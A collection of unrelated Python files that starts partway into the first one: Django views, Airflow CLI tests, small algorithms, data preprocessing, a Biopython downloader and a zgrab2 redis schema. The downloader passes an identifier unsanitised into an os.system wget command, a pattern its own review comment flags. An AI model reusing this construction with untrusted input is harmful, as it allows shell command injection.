        ouest_commande=Coalesce(Sum('commande', filter=Q(région="1")), 0),
        centre_commande=Coalesce(Sum('commande', filter=Q(région="2")), 0),
        est_commande=Coalesce(Sum('commande', filter=Q(région="3")), 0),
        month=TruncMonth('date')).order_by("-designation__nom")
    context = {
        'count_all':count_all,
        'count_centre': count_centre,
        'count_ouest': count_ouest,
        'count_est': count_est,
        'produit_nom': produit_nom,
        'mynumberFilter': mynumberFilter,
        'AllProduits_list' : AllProduits_list,
        'produit_count': produit_count,
        'produit_count2': produit_count2,
    }
    return render(request, 'number.html', context)
def homechart (request):
    # Render the chart page template.
    return render(request, 'count.html')
def count_produits(request):
    """Aggregate ordered quantities ('commande') per product, split by région
    code ("1"/"2"/"3" → ouest/centre/est), for the count.html chart page."""
    # Fix: the `def` line had been commented out, leaving a module-level
    # `return` (SyntaxError). The function definition is restored and the
    # many commented-out query experiments are removed.
    produit_count = Pumal.objects.values('designation__nom').annotate(
        ouest_commande=Coalesce(Sum('commande', filter=Q(région="1")), 0),
        centre_commande=Coalesce(Sum('commande', filter=Q(région="2")), 0),
        est_commande=Coalesce(Sum('commande', filter=Q(région="3")), 0),
    ).order_by("-designation__nom")
    return render(request, 'count.html', {'produit_count': produit_count})
def load_wilaya(request):
    """AJAX endpoint: render the wilayas of the selected région as a dropdown
    fragment (used to populate a dependent select)."""
    selected_region = request.GET.get('région_id')
    wilayas = Wilaya.objects.filter(région_id=selected_region).order_by('name')
    return render(request, 'dropdown_list.html', {'cities': wilayas})
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import argparse
import contextlib
import io
import os
import re
import subprocess
import sys
import timeit
from collections import Counter
from importlib import reload
from pathlib import Path
from unittest.mock import MagicMock, patch
import pytest
from airflow.cli import cli_config, cli_parser
from airflow.cli.cli_config import ActionCommand, core_commands, lazy_load_command
from airflow.cli.utils import CliConflictError
from airflow.configuration import AIRFLOW_HOME
from airflow.executors.local_executor import LocalExecutor
from tests.test_utils.config import conf_vars
# Can not be `--snake_case` or contain uppercase letter
ILLEGAL_LONG_OPTION_PATTERN = re.compile("^--[a-z]+_[a-z]+|^--.*[A-Z].*")
# Only can be `-[a-z]` or `-[A-Z]`
LEGAL_SHORT_OPTION_PATTERN = re.compile("^-[a-zA-z]$")
cli_args = {k: v for k, v in cli_parser.__dict__.items() if k.startswith("ARG_")}
class TestCli:
    """Consistency checks for the Airflow CLI definition tables: flag naming
    conventions, duplicate command/argument detection, and parser behaviour."""

    def test_arg_option_long_only(self):
        """
        Test if the name of cli.args long option valid
        """
        # Long-only options: a single flag that starts with '-'.
        optional_long = [
            arg for arg in cli_args.values() if len(arg.flags) == 1 and arg.flags[0].startswith("-")
        ]
        for arg in optional_long:
            assert ILLEGAL_LONG_OPTION_PATTERN.match(arg.flags[0]) is None, f"{arg.flags[0]} is not match"

    def test_arg_option_mix_short_long(self):
        """
        Test if the name of cli.args mix option (-s, --long) valid
        """
        # (-s, --long) pairs: two flags, short first.
        optional_mix = [
            arg for arg in cli_args.values() if len(arg.flags) == 2 and arg.flags[0].startswith("-")
        ]
        for arg in optional_mix:
            assert LEGAL_SHORT_OPTION_PATTERN.match(arg.flags[0]) is not None, f"{arg.flags[0]} is not match"
            assert ILLEGAL_LONG_OPTION_PATTERN.match(arg.flags[1]) is None, f"{arg.flags[1]} is not match"

    def test_subcommand_conflict(self):
        """
        Test if each of cli.*_COMMANDS without conflict subcommand
        """
        subcommand = {
            var: cli_parser.__dict__.get(var)
            for var in cli_parser.__dict__
            if var.isupper() and var.startswith("COMMANDS")
        }
        for group_name, sub in subcommand.items():
            name = [command.name.lower() for command in sub]
            assert len(name) == len(set(name)), f"Command group {group_name} have conflict subcommand"

    def test_subcommand_arg_name_conflict(self):
        """
        Test if each of cli.*_COMMANDS.arg name without conflict
        """
        subcommand = {
            var: cli_parser.__dict__.get(var)
            for var in cli_parser.__dict__
            if var.isupper() and var.startswith("COMMANDS")
        }
        for group, command in subcommand.items():
            for com in command:
                conflict_arg = [arg for arg, count in Counter(com.args).items() if count > 1]
                assert (
                    [] == conflict_arg
                ), f"Command group {group} function {com.name} have conflict args name {conflict_arg}"

    def test_subcommand_arg_flag_conflict(self):
        """
        Test if each of cli.*_COMMANDS.arg flags without conflict
        """
        subcommand = {
            key: val
            for key, val in cli_parser.__dict__.items()
            if key.isupper() and key.startswith("COMMANDS")
        }
        for group, command in subcommand.items():
            for com in command:
                # Positional args: a single flag with no leading '-'.
                position = [
                    a.flags[0] for a in com.args if (len(a.flags) == 1 and not a.flags[0].startswith("-"))
                ]
                conflict_position = [arg for arg, count in Counter(position).items() if count > 1]
                assert [] == conflict_position, (
                    f"Command group {group} function {com.name} have conflict "
                    f"position flags {conflict_position}"
                )
                # Long options: the sole flag of long-only options plus the
                # second flag of (-s, --long) pairs.
                long_option = [
                    a.flags[0] for a in com.args if (len(a.flags) == 1 and a.flags[0].startswith("-"))
                ] + [a.flags[1] for a in com.args if len(a.flags) == 2]
                conflict_long_option = [arg for arg, count in Counter(long_option).items() if count > 1]
                assert [] == conflict_long_option, (
                    f"Command group {group} function {com.name} have conflict "
                    f"long option flags {conflict_long_option}"
                )
                short_option = [a.flags[0] for a in com.args if len(a.flags) == 2]
                conflict_short_option = [arg for arg, count in Counter(short_option).items() if count > 1]
                assert [] == conflict_short_option, (
                    f"Command group {group} function {com.name} have conflict "
                    f"short option flags {conflict_short_option}"
                )

    @patch.object(LocalExecutor, "get_cli_commands")
    def test_dynamic_conflict_detection(self, cli_commands_mock: MagicMock):
        # Register a core command, then make the executor advertise a command
        # with the same name; reloading cli_parser must detect the clash.
        # NOTE(review): the appended core command is not removed afterwards —
        # consider a try/finally to avoid leaking state into other tests.
        core_commands.append(
            ActionCommand(
                name="test_command",
                help="does nothing",
                func=lambda: None,
                args=[],
            )
        )
        cli_commands_mock.return_value = [
            ActionCommand(
                name="test_command",
                help="just a command that'll conflict with one defined in core",
                func=lambda: None,
                args=[],
            )
        ]
        with pytest.raises(CliConflictError, match="test_command"):
            # force re-evaluation of cli commands (done in top level code)
            reload(cli_parser)

    def test_falsy_default_value(self):
        # A falsy default (0) must survive Arg.add_to_parser, not be dropped.
        arg = cli_config.Arg(("--test",), default=0, type=int)
        parser = argparse.ArgumentParser()
        arg.add_to_parser(parser)
        args = parser.parse_args(["--test", "10"])
        assert args.test == 10
        args = parser.parse_args([])
        assert args.test == 0

    def test_commands_and_command_group_sections(self):
        # `--help` exits with SystemExit; capture its stdout and check sections.
        parser = cli_parser.get_parser()
        with contextlib.redirect_stdout(io.StringIO()) as stdout:
            with pytest.raises(SystemExit):
                parser.parse_args(["--help"])
            stdout = stdout.getvalue()
        assert "Commands" in stdout
        assert "Groups" in stdout

    def test_dag_parser_commands_and_comamnd_group_sections(self):
        # NOTE(review): "comamnd" in this test's name is a typo for "command".
        parser = cli_parser.get_parser(dag_parser=True)
        with contextlib.redirect_stdout(io.StringIO()) as stdout:
            with pytest.raises(SystemExit):
                parser.parse_args(["--help"])
            stdout = stdout.getvalue()
        assert "Commands" in stdout
        assert "Groups" in stdout

    def test_should_display_help(self):
        # Every command (and nested subcommand) must accept --help.
        parser = cli_parser.get_parser()
        all_command_as_args = [
            command_as_args
            for top_command in cli_parser.airflow_commands
            for command_as_args in (
                [[top_command.name]]
                if isinstance(top_command, cli_parser.ActionCommand)
                else [[top_command.name, nested_command.name] for nested_command in top_command.subcommands]
            )
        ]
        for cmd_args in all_command_as_args:
            with pytest.raises(SystemExit):
                parser.parse_args([*cmd_args, "--help"])

    def test_dag_cli_should_display_help(self):
        parser = cli_parser.get_parser(dag_parser=True)
        all_command_as_args = [
            command_as_args
            for top_command in cli_config.dag_cli_commands
            for command_as_args in (
                [[top_command.name]]
                if isinstance(top_command, cli_parser.ActionCommand)
                else [[top_command.name, nested_command.name] for nested_command in top_command.subcommands]
            )
        ]
        for cmd_args in all_command_as_args:
            with pytest.raises(SystemExit):
                parser.parse_args([*cmd_args, "--help"])

    def test_positive_int(self):
        assert 1 == cli_config.positive_int(allow_zero=True)("1")
        assert 0 == cli_config.positive_int(allow_zero=True)("0")
        with pytest.raises(argparse.ArgumentTypeError):
            cli_config.positive_int(allow_zero=False)("0")
            # NOTE(review): this second call is unreachable — the line above
            # raises first. It likely deserves its own pytest.raises block.
            cli_config.positive_int(allow_zero=True)("-1")

    @pytest.mark.parametrize(
        "command",
        [
            "celery",
            "kubernetes",
        ],
    )
    def test_executor_specific_commands_not_accessible(self, command):
        # With SequentialExecutor, executor-specific command groups must not exist.
        with conf_vars({("core", "executor"): "SequentialExecutor"}), contextlib.redirect_stderr(
            io.StringIO()
        ) as stderr:
            reload(cli_parser)
            parser = cli_parser.get_parser()
            with pytest.raises(SystemExit):
                parser.parse_args([command])
            stderr = stderr.getvalue()
        assert (f"airflow command error: argument GROUP_OR_COMMAND: invalid choice: '{command}'") in stderr

    @pytest.mark.parametrize(
        "executor,expected_args",
        [
            ("CeleryExecutor", ["celery"]),
            ("CeleryKubernetesExecutor", ["celery", "kubernetes"]),
            ("KubernetesExecutor", ["kubernetes"]),
            ("LocalExecutor", []),
            ("LocalKubernetesExecutor", ["kubernetes"]),
            ("SequentialExecutor", []),
            # custom executors are mapped to the regular ones in `conftest.py`
            ("custom_executor.CustomLocalExecutor", []),
            ("custom_executor.CustomLocalKubernetesExecutor", ["kubernetes"]),
            ("custom_executor.CustomCeleryExecutor", ["celery"]),
            ("custom_executor.CustomCeleryKubernetesExecutor", ["celery", "kubernetes"]),
            ("custom_executor.CustomKubernetesExecutor", ["kubernetes"]),
        ],
    )
    def test_cli_parser_executors(self, executor, expected_args):
        """Test that CLI commands for the configured executor are present"""
        for expected_arg in expected_args:
            with conf_vars({("core", "executor"): executor}), contextlib.redirect_stderr(
                io.StringIO()
            ) as stderr:
                reload(cli_parser)
                parser = cli_parser.get_parser()
                with pytest.raises(SystemExit) as e:  # running the help command exits, so we prevent that
                    parser.parse_args([expected_arg, "--help"])
                assert e.value.code == 0, stderr.getvalue()  # return code 0 == no problem
                stderr = stderr.getvalue()
                assert "airflow command error" not in stderr

    def test_non_existing_directory_raises_when_metavar_is_dir_for_db_export_cleaned(self):
        """Test that the error message is correct when the directory does not exist."""
        with contextlib.redirect_stderr(io.StringIO()) as stderr:
            with pytest.raises(SystemExit):
                parser = cli_parser.get_parser()
                parser.parse_args(["db", "export-archived", "--output-path", "/non/existing/directory"])
            error_msg = stderr.getvalue()
        assert error_msg == (
            "\nairflow db export-archived command error: The directory "
            "'/non/existing/directory' does not exist!, see help above.\n"
        )

    @pytest.mark.parametrize("export_format", ["json", "yaml", "unknown"])
    @patch("airflow.cli.cli_config.os.path.isdir", return_value=True)
    def test_invalid_choice_raises_for_export_format_in_db_export_archived_command(
        self, mock_isdir, export_format
    ):
        """Test that invalid choice raises for export-format in db export-cleaned command."""
        with contextlib.redirect_stderr(io.StringIO()) as stderr:
            with pytest.raises(SystemExit):
                parser = cli_parser.get_parser()
                parser.parse_args(
                    ["db", "export-archived", "--export-format", export_format, "--output-path", "mydir"]
                )
            error_msg = stderr.getvalue()
        assert error_msg == (
            "\nairflow db export-archived command error: argument "
            f"--export-format: invalid choice: '{export_format}' "
            "(choose from 'csv'), see help above.\n"
        )

    @pytest.mark.parametrize(
        "action_cmd",
        [
            ActionCommand(name="name", help="help", func=lazy_load_command(""), args=(), hide=True),
            ActionCommand(name="name", help="help", func=lazy_load_command(""), args=(), hide=False),
        ],
    )
    @patch("argparse._SubParsersAction")
    def test_add_command_with_hide(self, mock_subparser_actions, action_cmd):
        # Hidden commands must be registered without help/description so they
        # do not appear in the generated --help output.
        cli_parser._add_command(mock_subparser_actions, action_cmd)
        if action_cmd.hide:
            mock_subparser_actions.add_parser.assert_called_once_with(
                action_cmd.name, epilog=action_cmd.epilog
            )
        else:
            mock_subparser_actions.add_parser.assert_called_once_with(
                action_cmd.name, help=action_cmd.help, description=action_cmd.help, epilog=action_cmd.epilog
            )
# We need to run it from sources with PYTHONPATH, not command line tool,
# because we need to make sure that we have providers configured from source provider.yaml files
# Path of the Airflow config file the subprocess tests below create/inspect.
CONFIG_FILE = Path(AIRFLOW_HOME) / "airflow.cfg"
class TestCliSubprocess:
    """
    We need to run it from sources using "__main__" and setting the PYTHONPATH, not command line tool,
    because we need to make sure that we have providers loaded from source provider.yaml files rather
    than from provider packages which might not be installed in the test environment.
    """

    def test_cli_run_time(self):
        # Rough performance guard: the average wall time of `airflow --help`
        # over a few runs must stay under the threshold.
        setup_code = "import subprocess"
        command = [sys.executable, "-m", "airflow", "--help"]
        env = {"PYTHONPATH": os.pathsep.join(sys.path)}
        timing_code = f"subprocess.run({command},env={env})"
        # Limit the number of samples otherwise the test will take a very long time
        num_samples = 3
        threshold = 3.5
        timing_result = timeit.timeit(stmt=timing_code, number=num_samples, setup=setup_code) / num_samples
        # Average run time of Airflow CLI should at least be within 3.5s
        assert timing_result < threshold

    def test_cli_parsing_does_not_initialize_providers_manager(self):
        """Test that CLI parsing does not initialize providers manager.

        This test is here to make sure that we do not initialize providers manager - it is run as a
        separate subprocess, to make sure we do not have providers manager initialized in the main
        process from other tests.
        """
        CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
        CONFIG_FILE.touch(exist_ok=True)
        result = subprocess.run(
            [sys.executable, "-m", "airflow", "providers", "lazy-loaded"],
            env={"PYTHONPATH": os.pathsep.join(sys.path)},
            check=False,
            text=True,
        )
        assert result.returncode == 0

    def test_airflow_config_contains_providers(self):
        """Test that airflow config has providers included by default.

        This test is run as a separate subprocess, to make sure we do not have providers manager
        initialized in the main process from other tests.
        """
        # Remove the config so `config list` regenerates it from defaults.
        CONFIG_FILE.unlink(missing_ok=True)
        result = subprocess.run(
            [sys.executable, "-m", "airflow", "config", "list"],
            env={"PYTHONPATH": os.pathsep.join(sys.path)},
            check=False,
            text=True,
        )
        assert result.returncode == 0
        assert CONFIG_FILE.exists()
        assert "celery_config_options" in CONFIG_FILE.read_text()

    def test_airflow_config_output_contains_providers_by_default(self):
        """Test that airflow config has providers excluded in config list when asked for it."""
        CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
        CONFIG_FILE.touch(exist_ok=True)
        result = subprocess.run(
            [sys.executable, "-m", "airflow", "config", "list"],
            env={"PYTHONPATH": os.pathsep.join(sys.path)},
            check=False,
            text=True,
            capture_output=True,
        )
        assert result.returncode == 0
        # Provider-contributed option appears in stdout by default.
        assert "celery_config_options" in result.stdout

    def test_airflow_config_output_does_not_contain_providers_when_excluded(self):
        """Test that airflow config has providers excluded in config list when asked for it."""
        CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
        CONFIG_FILE.unlink(missing_ok=True)
        CONFIG_FILE.touch(exist_ok=True)
        result = subprocess.run(
            [sys.executable, "-m", "airflow", "config", "list", "--exclude-providers"],
            env={"PYTHONPATH": os.pathsep.join(sys.path)},
            check=False,
            text=True,
            capture_output=True,
        )
        assert result.returncode == 0
        assert "celery_config_options" not in result.stdout
|
def bubble_sort(arr: list) -> list:
    """Return a sorted copy of *arr* using bubble sort (the input is not mutated).

    Fixes the shadowed loop variable: the original reused ``j`` for both the
    pass counter and the in-pass index, which produced the right result only
    by accident and made the code unreadable.
    """
    result = list(arr)
    n = len(result)
    for done in range(n):
        # After each pass the largest remaining element has bubbled to the
        # end, so the inner scan can stop `done` positions earlier.
        for i in range(n - 1 - done):
            if result[i] > result[i + 1]:
                result[i], result[i + 1] = result[i + 1], result[i]
    return result
|
import os
import re
from enum import Enum
class Status(Enum):
    """Service health state derived from scanning a log file (see get_status)."""
    unknown = 1  # no line matched a recognized log level
    up = 2       # newest classifiable line was INFO/DEBUG/WARNING
    down = 3     # newest classifiable line was ERROR/CRITICAL
def reverse_readline(filename, buffer_size=8196):
    """Yield the lines of *filename* from last to first.

    Fixes two defects in the original: the partial line at the start of each
    buffer was never saved into ``rest`` (so lines spanning a buffer boundary
    were dropped or mangled and the first line of the file was never yielded),
    and the file handle was never closed.
    """
    with open(filename) as log:
        rest = None  # possibly-incomplete first line of the previous buffer
        log.seek(0, os.SEEK_END)
        current_position = log.tell()
        while current_position > 0:
            read_size = min(buffer_size, current_position)
            current_position -= read_size
            log.seek(current_position)
            read_buffer = log.read(read_size)
            lines = read_buffer.split('\n')
            if rest is not None:
                if read_buffer and read_buffer[-1] != '\n':
                    # Buffer ends mid-line: its last segment is the head of
                    # the previously saved partial line.
                    lines[-1] += rest
                else:
                    yield rest
            # lines[0] may itself be incomplete; hold it until the next
            # (earlier) buffer is read.
            rest = lines[0]
            for line in lines[-1:0:-1]:
                yield line
        # The very first line of the file.
        if rest is not None:
            yield rest
def get_status(filename):
    """Classify the service as up/down based on the newest classifiable log line."""
    ok_pattern = re.compile(r'(INFO|DEBUG|WARNING)')
    bad_pattern = re.compile(r'(ERROR|CRITICAL)')
    # Walk the log backwards so the most recent recognizable level wins.
    for line in reverse_readline(filename):
        if ok_pattern.search(line):
            return Status.up
        if bad_pattern.search(line):
            return Status.down
    # No line carried a recognized level.
    return Status.unknown
|
import sys
sys.setrecursionlimit(10000)
def root(x):
    """Return the union-find representative of x in the global parent table b.

    Performs one-step path compression: x is re-pointed directly at its root.
    """
    rep = x
    while b[rep] != rep:
        rep = b[rep]
    b[x] = rep
    return rep
def dijkstra(x, y):
    """Shortest path from x to y over the global weighted adjacency matrix c.

    Python 2 code (uses sys.maxint). Vertices are numbered 1..n (globals n, c).
    Returns (distance, path) where path lists the vertices from y back to x.
    NOTE(review): if y is unreachable, minp stays -1 and vis[-1] is written —
    callers appear to invoke this only for vertices already connected in c.
    """
    dist = [sys.maxint]*(n+1)
    prev = [None]*(n+1)
    vis = [False]*(n+1)
    dist[x] = 0
    while True:
        # Pick the unvisited vertex with the smallest tentative distance.
        minp, mind = -1, sys.maxint
        for i in range(1, n+1):
            if not vis[i] and dist[i] < mind:
                mind = dist[i]
                minp = i
        if minp == y:
            break
        vis[minp] = True
        # Relax all edges out of minp; c[u][v] > 0 marks an edge of that weight.
        for i in range(1, n+1):
            if c[minp][i] > 0 and dist[i] > mind + c[minp][i]:
                dist[i] = mind + c[minp][i]
                prev[i] = minp
    # Rebuild the path by following predecessor links back from y.
    path = []
    tmp = y
    while prev[tmp] != None:
        path.append(tmp)
        tmp = prev[tmp]
    path.append(x)
    return dist[y], path
# Driver (Python 2): read graphs from stdin until a '-1' sentinel line.
# Edges are added in ascending weight order (Kruskal-style union-find); when
# an edge would close a cycle, the existing tree path between its endpoints
# is found with dijkstra and compared against the best candidate so far.
# NOTE(review): this appears to search for a minimum-weight cycle / best
# replacement path — confirm against the original problem statement.
while True:
    line = sys.stdin.readline()
    if line.strip() == '-1':  # sentinel ends the input stream
        break
    n, m = [int(x) for x in line.split()]
    a = []
    for i in range(m):
        a.append([int(x) for x in sys.stdin.readline().split()])
    a.sort(key=lambda x: x[2])  # sort edges by ascending weight
    b = [x for x in range(n+1)]          # union-find parent table (used by root)
    c = [[0]*(n+1) for x in range(n+1)]  # adjacency matrix of accepted edges
    min_path = 'No solution.'
    min_dist = sys.maxint
    count, lower = 0, 0
    for x, y, z in a:
        if c[x][y] > 0:
            continue  # a parallel edge between x and y was already accepted
        count += 1
        if count < 3:
            lower += z  # running lower bound from the two lightest edges
        elif min_dist <= lower + z:
            break  # remaining edges are too heavy to beat the best found
        rx, ry = root(x), root(y)
        if rx == ry:
            # Edge closes a cycle: compare tree path + this edge to the best.
            dist, path = dijkstra(x, y)
            if dist + z < min_dist:
                min_dist = dist + z
                min_path = ' '.join([str(i) for i in path])
        else:
            # Accept the edge into the forest.
            b[ry] = rx
            c[x][y] = z
            c[y][x] = z
    print min_path
|
import numpy as np
import json
import os
import random
from config import Config
def preprocess_user_data(filename):
    """Build training samples from a tab-separated user-behavior file.

    Each line is: userID, time, history, impressions — history is a
    space-separated list of news ids, each impression is "newsid-label" with
    label 1 (clicked) or 0 (skipped).

    Returns (all_browsed_news, all_click, all_unclick, all_candidate,
    all_label): one sample per positive impression, paired with
    Config.neg_sample negatives drawn from the same impression list.

    NOTE(review): the field layout above is inferred from the parsing code;
    confirm against the actual dataset. Restructuring this function would
    change the sequence of seeded random.sample calls and hence the sampled
    negatives, so the code is kept as-is.
    """
    print("Preprocessing user data...")
    browsed_news = []
    impression_news = []
    with open(filename, "r") as f:
        data = f.readlines()
    # Fixed seed so the shuffle and the later negative sampling are reproducible.
    random.seed(212)
    random.shuffle(data)
    use_num = int(len(data) * 1)  # currently uses 100% of the lines
    use_data = data[:use_num]
    for l in use_data:
        userID, time, history, impressions = l.strip('\n').split('\t')
        history = history.split()
        browsed_news.append(history)
        impressions = [x.split('-') for x in impressions.split()]
        impression_news.append(impressions)
    # Split every impression list into clicked (label 1) and skipped news ids.
    impression_pos = []
    impression_neg = []
    for impressions in impression_news:
        pos = []
        neg = []
        for news in impressions:
            if int(news[1]) == 1:
                pos.append(news[0])
            else:
                neg.append(news[0])
        impression_pos.append(pos)
        impression_neg.append(neg)
    all_browsed_news = []
    all_click = []
    all_unclick = []
    all_candidate = []
    all_label = []
    # One sample per positive impression: positive id first, then negatives.
    for k in range(len(browsed_news)):
        browsed = browsed_news[k]
        pos = impression_pos[k]
        neg = impression_neg[k]
        for pos_news in pos:
            all_browsed_news.append(browsed)
            all_click.append([pos_news])
            # NOTE(review): raises ValueError when a user has fewer than
            # Config.neg_sample negatives — confirm the data guarantees enough.
            neg_news = random.sample(neg, Config.neg_sample)
            all_unclick.append(neg_news)
            all_candidate.append([pos_news]+neg_news)
            all_label.append([1] + [0] * Config.neg_sample)
    print('original behavior: ', len(browsed_news))
    print('processed behavior: ', len(all_browsed_news))
    return all_browsed_news, all_click, all_unclick, all_candidate, all_label
def preprocess_test_user_data(filename):
    """Build evaluation samples from a tab-separated behavior file.

    Shuffles with a fixed seed and keeps 10% of the lines. Every impression
    becomes one test sample; impression_index records the [begin, end) sample
    range that belongs to each input line so per-impression metrics can be
    grouped later.

    Returns (impression_index, user_index, user_browsed_test, all_user_test,
    all_candidate_test, all_label_test).
    """
    print("Preprocessing test user data...")
    with open(filename, 'r') as f:
        data = f.readlines()
    # Same fixed seed as the training preprocessor, for reproducibility.
    random.seed(212)
    random.shuffle(data)
    use_num = int(len(data) * 0.1)  # evaluate on 10% of the lines
    use_data = data[:use_num]
    impression_index = []
    user_browsed_test = []
    all_candidate_test = []
    all_label_test = []
    user_index = {}
    all_user_test = []
    for l in use_data:
        userID, time, history, impressions = l.strip('\n').split('\t')
        # First occurrence of a user assigns a dense integer index and stores
        # that user's browsing history (later lines reuse the stored history).
        if userID not in user_index:
            user_index[userID] = len(user_index)
            history = history.split()
            user_browsed_test.append(history)
        impressions = [x.split('-') for x in impressions.split()]
        begin = len(all_candidate_test)
        end = len(impressions) + begin
        impression_index.append([begin, end])
        for news in impressions:
            all_user_test.append(userID)
            all_candidate_test.append([news[0]])
            all_label_test.append([int(news[1])])
    print('test samples: ', len(all_label_test))
    print('Found %s unique users.' % len(user_index))
    return impression_index, user_index, user_browsed_test, all_user_test, all_candidate_test, all_label_test
|
import os
import sys
import re
from Bio import SeqIO
class IPIHandler:
    """Download an IPI record from the EBI SRS service and parse it with Biopython.

    The page is fetched with wget into seq/<ipi_code>.seq, stripped of HTML
    tags in place, then parsed in SwissProt format.

    Fixes: the original never closed the write handle in strip_html (risking
    unflushed output) nor the parse handle in __init__, and carried a no-op
    ``except ValueError: raise``.
    """

    def strip_html(self):
        """Remove HTML tags from the downloaded file, rewriting it in place."""
        with open(self.seq_file, 'r') as ifh:
            lines = ifh.readlines()
        # Reopen for writing only after the read handle is closed.
        with open(self.seq_file, 'w') as ofh:
            for line in lines:
                ofh.write(re.sub(r'<[^>]*?>', '', line))

    def __init__(self, ipi_code=None):
        # NOTE(review): ipi_code is interpolated into a shell command —
        # only trusted codes are safe here; consider subprocess.run with an
        # argument list to avoid shell injection.
        url = "http://srs.ebi.ac.uk/srsbin/cgi-bin/wgetz?-e+[IPI-acc:"+ipi_code+"]+-vn+2"
        os.system('wget -o wget-log --output-document=seq/'+ipi_code+'.seq '+url)
        self.seq_file = 'seq/'+ipi_code+'.seq'
        self.strip_html()
        # Parse the cleaned record; the handle is closed even if parsing
        # raises (e.g. ValueError from SeqIO.read), which still propagates.
        with open(self.seq_file) as handle:
            self.record = SeqIO.read(handle, 'swiss')

    def getSequence(self):
        """Return the parsed sequence object."""
        return self.record.seq

    def getSequenceID(self):
        """Return the record identifier."""
        return self.record.id

    def getSequenceLength(self):
        """Return the sequence length in residues."""
        return len(self.record.seq)

    def getSequenceXRefs(self):
        """Return the record's database cross-references."""
        return self.record.dbxrefs
|
"""
This file contains functions dealing with JSON.
"""
import json
import os
import pathlib
from config import PROCEESED_DIR
def write_json(object: dict, filename: str) -> None:
    """Serialize *object* to PROCEESED_DIR/<filename>.json.

    Creates PROCEESED_DIR if needed. Fix: the original ignored the *filename*
    argument entirely and wrote every call to the same hard-coded file name,
    so successive calls silently overwrote each other.
    """
    pathlib.Path(PROCEESED_DIR).mkdir(parents=True, exist_ok=True)
    outpath = os.path.join(PROCEESED_DIR, f'{filename}.json')
    with open(outpath, 'w') as fp:
        json.dump(object, fp)
|
import unittest
import chemical_elements as E
class TestChemicalElements(unittest.TestCase):
    """Sanity checks for the chemical_elements module."""

    def test_count(self):
        """All 118 elements exist, numbered 1..118 in order."""
        N = 118
        self.assertEqual(len(E.ELEMENTS), N)
        # list(...) is required: on Python 3 a list never compares equal to a
        # range object, so the original assertion could not pass.
        self.assertEqual([e.number for e in E.ELEMENT_LIST], list(range(1, N + 1)))

    def test_tritium(self):
        """Tritium ("T") is an isotope, not an element, and must not be listed."""
        self.assertNotIn("T", E.ELEMENTS)

    def test_weights_are_numbers(self):
        """Every element weight must parse as a float."""
        bad = []
        for e in E.ELEMENT_LIST:
            try:
                float(e.weight)
            except ValueError:
                bad.append((e.symbol, e.weight))
        # Collect all offenders first so the failure message lists every one.
        self.assertEqual(bad, [])
# Allow running this test module directly with `python <this file>`.
if __name__ == "__main__":
    unittest.main()
|
################################################################################
# Cristian Alexandrescu #
# 2163013577ba2bc237f22b3f4d006856 #
# 11a4bb2c77aca6a9927b85f259d9af10db791ce5cf884bb31e7f7a889d4fb385 #
# bc9a53289baf23d369484f5343ed5d6c #
################################################################################
import math
def IsPrime(n, Primes):
    """Trial-divide n by the supplied primes, stopping once they exceed sqrt(n).

    Correct only when Primes contains every prime up to sqrt(n), which holds
    for the incremental sieve in GenPrimes.
    """
    limit = int(math.sqrt(n))
    for p in Primes:
        if p > limit:
            break
        if n % p == 0:
            return False
    return True
def GenPrimes(Limit):
    """Return every prime below Limit, grown incrementally via trial division.

    Seeded with the primes below 13; only odd candidates are tested.
    """
    primes = [2, 3, 5, 7, 11]
    for candidate in range(13, Limit, 2):
        if IsPrime(candidate, primes):
            primes.append(candidate)
    return primes
def GenCirculars(n):
    """Return the list of all digit rotations of n, starting with n itself.

    Fixes: floor division (//) replaces the original int(n / 10) — float
    division silently loses precision for n >= 2**53 — and the builtin name
    `list` is no longer shadowed.
    """
    digit_count = len(str(n))
    rotations = [n]
    for _ in range(1, digit_count):
        last_digit = n % 10
        # Move the last digit to the front.
        n = n // 10 + last_digit * (10 ** (digit_count - 1))
        rotations.append(n)
    return rotations
def Solve():
    """Count (and print) the circular primes below one million.

    A prime is circular when every rotation of its digits is also prime.
    """
    primes = set(GenPrimes(1000000))
    total = 0
    for p in primes:
        # All rotations stay below one million, so set membership suffices.
        if all(rotation in primes for rotation in GenCirculars(p)):
            print("Circular ", p)
            total = total + 1
    print(total)
print ("PROJECT EULER 035:");
Solve(); |
# zschema sub-schema for zgrab2's redis module
# Registers zgrab2-redis globally, and redis with the main zgrab2 schema.
from zschema.leaves import *
from zschema.compounds import *
import zschema.registry
import zcrypto_schemas.zcrypto as zcrypto
import zgrab2
# Response schema for zgrab2's redis scanner.
redis_scan_response = SubRecord({
    "result": SubRecord({
        "commands": ListOf(String(), doc="The list of commands actually sent to the server, serialized in inline format, like 'PING' or 'AUTH somePassword'."),
        "raw_command_output": ListOf(Binary(), doc="The raw output returned by the server for each command sent; the indices match those of commands."),
        "ping_response": String(doc="The response from the PING command; should either be \"PONG\" or an authentication error.", examples=[
            "PONG",
            "(Error: NOAUTH Authentication required.)",
        ]),
        "info_response": String(doc="The response from the INFO command. Should be a series of key:value pairs separated by CRLFs.", examples=[
            "# Server\r\nredis_version:4.0.7\r\nkey2:value2\r\n",
            "(Error: NOAUTH Authentication required.)",
        ]),
        "auth_response": String(doc="The response from the AUTH command, if sent."),
        # Fix: the description was passed positionally; every sibling field
        # passes it via doc=, and the first positional parameter of zschema
        # leaves is not the documentation string.
        "nonexistent_response": String(doc="The response from the NONEXISTENT command.", examples=[
            "(Error: ERR unknown command 'NONEXISTENT')",
        ]),
        "quit_response": String(doc="The response to the QUIT command.", examples=["OK"]),
        "version": String(doc="The version string, read from the info_response (if available)."),
    })
}, extends=zgrab2.base_scan_response)

# Make the schema discoverable by name and attach it to the zgrab2 registry.
zschema.registry.register_schema("zgrab2-redis", redis_scan_response)
zgrab2.register_scan_response_type("redis", redis_scan_response)
|
import sys
class Error(BaseException):
    """Base error type for this interpreter.

